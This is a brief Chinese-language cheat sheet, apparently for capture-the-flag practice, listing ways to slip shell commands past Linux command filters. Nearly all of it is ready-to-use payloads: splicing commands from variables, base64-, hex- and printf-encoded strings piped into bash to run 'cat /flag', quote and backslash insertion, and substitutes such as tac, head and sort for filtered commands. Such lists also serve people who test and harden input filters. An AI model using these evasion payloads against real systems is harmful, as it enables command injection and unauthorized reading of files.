Linux用不常用的命令绕过常用命令过滤

几个常用方法

定义变量然后拼接绕过

ls
a=l;b=s;$a$b

编码绕过

echo "Y2F0IC9mbGFn" | base64 -d | bash # =>cat /flag in base64
echo "636174202f666c6167" | xxd -r -p | bash # =>cat /flag in hex

上述适用于echo没被过滤的情况

$(printf "\x63\x61\x74\x20\x2f\x66\x6c\x61\x67") # =>cat /flag
{printf,"\x63\x61\x74\x20\x2f\x66\x6c\x61\x67"}|\$0 # =>cat /flag

适用于printf没被过滤的情况

引号绕过

ca''t fl''ag
ca""t fl""ag

反斜杠绕过

ca\t fl\ag

可供替换的冷门命令

ls

dir

cat

tac, sort, more, less, head, tail, (sed)